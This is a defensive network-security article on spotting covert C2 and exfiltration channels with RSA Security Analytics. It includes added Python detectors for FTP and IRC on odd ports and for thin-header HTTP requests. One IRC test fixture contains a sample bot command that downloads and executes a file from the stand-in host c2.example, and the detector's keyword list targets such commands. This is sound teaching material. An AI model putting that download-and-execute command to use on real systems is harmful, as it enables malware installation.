
Covert Operations: Kill Chain Actions using Security Analytics
Written by Aman Diwakar

In Special Operations, there are multiple actors on either side of the battlefield, at any point in time, attempting to achieve tactical leverage over the enemy. This leverage comes in multiple forms, at different stages of combat, and the entire process is referred to as the Kill Chain. The kill chain in special operations includes reconnaissance, weaponization, payload delivery, exploitation, establishment of communication from behind enemy lines and, ultimately, completion of the mission and successful exfiltration. As an Intelligence Analyst in the military, I was intimately familiar with this process and with how successful actions on target, executed in rapid, deliberate succession, would mean victory for the unit best able to execute them and defeat for the opposing force. This article will highlight how, using security intelligence, you, the Network Operator, can gain tactical leverage, interrupt the kill chain and successfully defend your area of responsibility against the threat actor or aggressor. Your goal will be to remain eternally vigilant; it is the price we pay for security, whether in the cyber world or the physical one.

In order to prepare to defend your network, you need to gather all the information and intelligence you possibly can, because those aiming to exploit it will be very well prepared, most of the time better prepared than you, because it is they who choose the time and place. Because compiling and discussing all the possible permutations of data points is outside the scope of this article, we will focus on the two most important pieces of information you will need to acquire. The first is logging and activity data from the infrastructure; the second is packet data from network taps at strategic chokepoints in the network.
Finally, you will need to be able to take these two pieces of network intelligence and correlate them quickly and effectively, because this information will likely be unstructured and disparate. The only commonality is that, when correctly and intelligently manipulated, this data will yield the information required to make the tactical decisions that pave the way for a successful defense.

Once the above preparations are in place, the majority of your time should be spent identifying and monitoring the network for malicious activity. The determined adversary will first attempt to gain intelligence on the target; your role will be to take that opportunity to gather counterintelligence. This counterintelligence will be critical in identifying the specific threat from the sea of adversaries that your network faces on a daily basis. It is, however, an extremely challenging objective, as the advanced threat actor will be attempting to thwart counterintelligence activities. Information regarding the potential attacker can often be ascertained from artifacts in the malware's code that reference a language or country of origin, from the attacker's modus operandi (based on historical data), or from the ways in which commonly used tools have been customized. Because the attacker is constantly seeking to avoid detection or mislead you, any one of these telltale signs can easily be spoofed, so it is best to take all observed activity into account holistically when attempting identification. Security analytics tools that consume network telemetry data and surface possibly suspicious or malicious traffic are instrumental in the identification phase as well as in the containment of such activities on the network. In the rest of this article, we will be using information obtained from RSA's Security Analytics to demonstrate the identification of malicious activity on the network that hides itself in what looks like benign HTTP or IRC traffic. This type of network evasion is generally referred to as a covert channel: the attacker attempts to hide C2 (Command and Control) and data exfiltration traffic, and in doing so subverts traditional security controls such as signature-based IPS/IDS mechanisms and, additionally, firewall filters.
Security Analytics is designed to track and identify those threats on the network that traditional detection methods have not yet identified in the wild, for instance because the attacker is exploiting an as-yet unidentified vulnerability in the infrastructure's components. There are two methods of searching for suspicious activity, and both check for data leaks, potentially unauthorized file transfers and C2 activity. The first method searches for traffic to suspicious countries, that is, files sent outside the US by systems that should not be engaging in this behavior; the second method searches for file transfer and IRC communication traffic over non-standard ports. In the snapshot illustrated above, SA has identified potential data exfiltration activity by correlating different pieces of network data, such as IP-by-country and a packet capture that confirms a data channel.

One common method of obfuscating a file transfer is tunneling FTP traffic over non-standard ports. This method is commonly referred to as a covert channel, although it is not limited to FTP traffic: in the sense used throughout this article, a covert channel is packet data transmitted over ports on which that protocol would generally not travel, as is common in many P2P applications (the classical definition of the term is broader). The concern with this type of traffic is that it is a common vector for C2 communications, as C2 traffic is commonly sent over IRC. As we follow a suspected file transfer, we are able to simply click the suspicious activity and identify the destination country the file was sent to, in this case Uzbekistan. Of course, many organizations do business with Uzbekistan and it is entirely plausible that this is legitimate traffic in those organizations; in this case, however, we did not, and as such we tagged this as suspicious activity. The screen below identifies the file transfer, including username/password, ports and the name of the file that was transmitted (FTP carries its control channel in cleartext, so a full-packet capture exposes all of this). This activity will now trigger an investigation and a determination as to why it took place and whether further action is needed.
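The two checks described above, a known protocol running on a port where it does not belong and a file leaving for a country the organization has no business with, come down to a small amount of content-based classification, and the same logic serves the IRC C2 case that is discussed next. The following is an added example, not code from the article or from RSA Security Analytics: it identifies FTP and IRC from the payload rather than from the port, extracts the FTP username, password and file name from the cleartext control channel, pulls operator instructions out of IRC PRIVMSG lines, and looks the destination up in an IP-to-country table. The payloads, addresses, ports, country table and allow-list are all constructed for the example.

```python
"""Flag FTP and IRC sessions running over ports where they do not belong.

Added example for this article, not code from it or from RSA Security
Analytics. Protocol is identified from the payload, never from the port:
the port is the one attribute the attacker freely chooses.
"""
import re
from collections import namedtuple
from typing import List, Optional

Session = namedtuple("Session", "src dst dport payload")

# Ports on which each protocol is expected; any other port is non-standard.
STANDARD_PORTS = {"ftp": {21}, "irc": {6667, 6697}}

# Constructed stand-in for a GeoIP lookup (a real deployment uses a GeoIP DB).
IP_COUNTRY = {"203.0.113.7": "UZ", "198.51.100.9": "US", "192.0.2.44": "DE"}
# Constructed policy: countries with which the organization does business.
ALLOWED_COUNTRIES = {"US"}

# Content markers. FTP: server reply codes and commands that IRC never uses.
FTP_MARKERS = re.compile(r"^(220 |331 |230 |PASS |STOR |RETR |PASV|PORT )", re.M)
# IRC: commands, optionally preceded by a ':prefix ' as in server relays.
IRC_MARKERS = re.compile(r"^(?::\S+ )?(NICK |JOIN |PRIVMSG |PING |PONG )", re.M)


def identify_protocol(payload: str) -> Optional[str]:
    """Return 'ftp', 'irc' or None, judged on two or more protocol markers."""
    if len(FTP_MARKERS.findall(payload)) >= 2:
        return "ftp"
    if len(IRC_MARKERS.findall(payload)) >= 2:
        return "irc"
    return None


def ftp_details(payload: str) -> dict:
    """Pull username, password and file name from a cleartext FTP control channel."""
    def first(cmd: str) -> Optional[str]:
        m = re.search(rf"^{cmd} (.+?)\r?$", payload, re.M)
        return m.group(1) if m else None
    return {"user": first("USER"), "password": first("PASS"),
            "file": first("STOR") or first("RETR")}


def irc_messages(payload: str) -> List[str]:
    """Return PRIVMSG bodies; operator instructions to a bot travel here."""
    return re.findall(r"PRIVMSG \S+ :(.+?)\r?$", payload, re.M)


def analyze(session: Session) -> List[str]:
    """Return human-readable findings for one session (empty list = nothing)."""
    findings = []
    proto = identify_protocol(session.payload)
    if proto is None:
        return findings
    if session.dport not in STANDARD_PORTS[proto]:
        findings.append(f"{proto.upper()} on non-standard port {session.dport}")
    country = IP_COUNTRY.get(session.dst, "??")
    if proto == "ftp":
        d = ftp_details(session.payload)
        if d["file"] and country not in ALLOWED_COUNTRIES:
            findings.append(f"file {d['file']!r} sent to {country} "
                            f"as user {d['user']!r}")
    elif proto == "irc":
        for msg in irc_messages(session.payload):
            if re.search(r"download|exec|http", msg, re.I):
                findings.append(f"IRC instruction: {msg}")
    return findings


# Constructed sample sessions: exfiltration to UZ over port 8443, the same
# transfer to a US partner on port 21, IRC C2 on port 443, and plain HTTP.
FTP_EXFIL = ("220 (vsFTPd 3.0.3)\r\nUSER backup\r\n331 Please specify the password.\r\n"
             "PASS hunter2\r\n230 Login successful.\r\nSTOR payroll_q3.xlsx\r\n"
             "226 Transfer complete.\r\n")
IRC_C2 = ("NICK bot-7f3a\r\nUSER bot-7f3a 0 * :bot\r\nJOIN #ctrl\r\n"
          ":ops!ops@c2.example PRIVMSG #ctrl :!download http://c2.example/u.exe && !exec u.exe\r\n")
HTTP_GET = "GET / HTTP/1.1\r\nHost: intranet.example\r\n\r\n"

SESSIONS = [
    Session("10.0.0.15", "203.0.113.7", 8443, FTP_EXFIL),
    Session("10.0.0.15", "198.51.100.9", 21, FTP_EXFIL),
    Session("10.0.0.22", "192.0.2.44", 443, IRC_C2),
    Session("10.0.0.31", "192.0.2.44", 80, HTTP_GET),
]


def run(sessions=SESSIONS) -> dict:
    """Map 'src->dst:port' to its findings, dropping sessions with none."""
    report = {}
    for s in sessions:
        f = analyze(s)
        if f:
            report[f"{s.src}->{s.dst}:{s.dport}"] = f
    return report


if __name__ == "__main__":
    for key, findings in run().items():
        print(key)
        for f in findings:
            print("  -", f)
```

Note that the second session carries the identical FTP payload but produces no finding: it runs on port 21 to an allowed country, which is exactly the baseline the port-based rule would also have let through. Only the content-based classification catches the first session, because an IDS rule keyed on destination port 21 or 6667 never sees either the FTP-on-8443 or the IRC-on-443 session at all.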

The illustration below demonstrates IRC-based covert channel activity: the IRC traffic is attempting to hide on a non-standard port, and upon inspection it is discovered that the exchange has attempted to download and execute malicious code. This code could be the basis for establishing botnet C2 or for installing other viruses or malware. One might think that a hardened operating system along with good antivirus protection would mitigate this type of attack; however, with remote command shell exploitation and zero-day threats, these attacks commonly bypass antivirus and antimalware filters and detection engines. The attacker can now pivot to a privilege escalation attack and get this host to participate in malicious activity, or the host may simply be the destination system the attacker was attempting to infiltrate.

The last example below is a capture of another service, Gnutella, as it was being used to download a Flash installation from Macromedia/Adobe's website. This is a perfect example of a P2P application that tunnels traffic over HTTP; because the HTTP header information is suspicious (low header count), this traffic is flagged by SA for an administrator to review further. Here, Gnutella issued an HTTP GET request, and we are able to dissect the event and reconstruct it per the preceding screenshots and packet samples. The packet capture indicates that the session was initiated to get an update of Flash Player.
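The low header count heuristic that flagged the Gnutella session can be reproduced with a few lines of parsing. The following is an added example, not the article's or RSA's code: it parses a raw HTTP request, reconstructs the URL an analyst wants to see from the request line and Host header, and flags requests that carry fewer headers than a browser sends or lack the usual browser headers. The three requests are constructed; only the host name fpdownload2.macromedia.com is taken from the article, the path and user-agent strings are invented, and the threshold of four headers and the list of P2P client names are assumptions to be tuned against your own traffic baseline.

```python
"""Flag HTTP requests whose header set is too thin to have come from a browser.

Added example for this article, not code from it or from RSA Security
Analytics. MIN_HEADERS, BROWSER_HEADERS and P2P_AGENTS are assumptions to
tune against a baseline of your own users' traffic.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

MIN_HEADERS = 4  # assumed threshold; browsers typically send well over this
BROWSER_HEADERS = {"accept", "accept-language", "accept-encoding", "connection"}
# User-agent fragments of well-known Gnutella clients (assumed list).
P2P_AGENTS = re.compile(r"limewire|gnutella|bearshare|frostwire", re.I)


@dataclass
class Request:
    method: str
    uri: str
    version: str
    headers: Dict[str, str] = field(default_factory=dict)


def parse_request(raw: bytes) -> Request:
    """Parse the request line and headers of one raw HTTP request."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, uri, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, uri, version, headers)


def reconstruct(req: Request) -> str:
    """Rebuild the request as an analyst reads it: method, URL, client."""
    host = req.headers.get("host", "<no host>")
    agent = req.headers.get("user-agent", "<no user-agent>")
    return f"{req.method} http://{host}{req.uri} via {agent}"


def assess(req: Request) -> List[str]:
    """Return findings for one request; an empty list means it looks like a browser."""
    findings = []
    n = len(req.headers)
    if n < MIN_HEADERS:
        findings.append(f"low header count: {n} < {MIN_HEADERS}")
    missing = sorted(BROWSER_HEADERS - set(req.headers))
    if missing:
        findings.append("missing browser headers: " + ", ".join(missing))
    agent = req.headers.get("user-agent", "")
    if P2P_AGENTS.search(agent):
        findings.append(f"P2P client user-agent: {agent}")
    return findings


# Constructed requests: a browser fetching the update, a Gnutella client
# fetching the same URL with a minimal header set, and a bare HTTP/1.0 GET.
BROWSER_GET = (b"GET /flashplayer/update.cab HTTP/1.1\r\n"
               b"Host: fpdownload2.macromedia.com\r\n"
               b"User-Agent: Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/30.0\r\n"
               b"Accept: */*\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip\r\n"
               b"Referer: http://www.adobe.com/\r\nConnection: keep-alive\r\n\r\n")
GNUTELLA_GET = (b"GET /flashplayer/update.cab HTTP/1.1\r\n"
                b"Host: fpdownload2.macromedia.com\r\n"
                b"User-Agent: LimeWire/4.18.8\r\n\r\n")
BARE_GET = b"GET / HTTP/1.0\r\n\r\n"

REQUESTS = {"browser": BROWSER_GET, "gnutella": GNUTELLA_GET, "bare": BARE_GET}


def run(requests=REQUESTS) -> Dict[str, List[str]]:
    """Assess every request and return findings keyed by the request's label."""
    return {name: assess(parse_request(raw)) for name, raw in requests.items()}


if __name__ == "__main__":
    for name, raw in REQUESTS.items():
        req = parse_request(raw)
        print(name, "->", reconstruct(req))
        for f in assess(req):
            print("  -", f)
```

The header count alone is a weak signal (scripts, updaters and monitoring agents also send thin requests), which is why the example reports which browser headers are absent and which client announced itself, so that the administrator reviewing the flag has enough context to decide quickly whether the traffic is a P2P client, a legitimate updater or something worth a full session reconstruction.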


The figure above is a live packet capture event reconstruction: it shows Gnutella traffic over port 80 issuing an HTTP GET for Flash to the host fpdownload2.macromedia.com. To summarize, C2 and malicious traffic evasion tactics are evolving as malicious actors attempt to stay ahead of the malware research community. Malware is becoming more difficult to analyze, as its authors prevent the malicious code from executing in a sandbox if it detects that no human is driving it via mouse or keyboard, or that the process is not executing on a human-facing system, i.e., a user PC or server. Furthermore, such activity hides behind encrypted, covert channels to take it up another notch. The adversary will become more sophisticated and determined as the motivation for such actions continues to be financial or political advantage, placing you on the front lines of full-fledged cyber warfare.
